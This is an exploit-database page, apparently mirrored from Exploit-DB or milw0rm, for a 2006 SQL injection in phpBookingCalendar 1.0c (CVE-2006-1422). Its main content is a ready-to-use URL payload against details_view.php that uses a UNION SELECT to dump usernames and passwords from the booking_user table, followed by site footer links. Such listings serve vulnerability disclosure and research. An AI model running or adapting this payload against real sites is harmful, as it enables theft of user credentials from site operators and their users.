[] NeoSense
E X P L O I T S
title author type platform port cve id

phpBookingCalendar 1.0c - 'details_view.php' SQL Injection

Author: undefined1_
type: webapps
platform: php
port: 
date_added: 2006-03-24 
date_updated: 2016-06-30 
verified: 1 
codes: OSVDB-31624;CVE-2006-1422 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpBookingCalendar_1.0c.zip
PoC by undefined1_ @ bash-x.net/undef/

phpBookingCalendar <= 1.0c
"A PHP/MySQL Booking Calendar Application."
http://www.jjwdesign.com/booking_calendar.html

phpBookingCalendar is prone to a sql injection attack. the sql injection works regardless of any magic_quotes_gpc settings.
www.site.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user

# milw0rm.com [2006-03-25]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.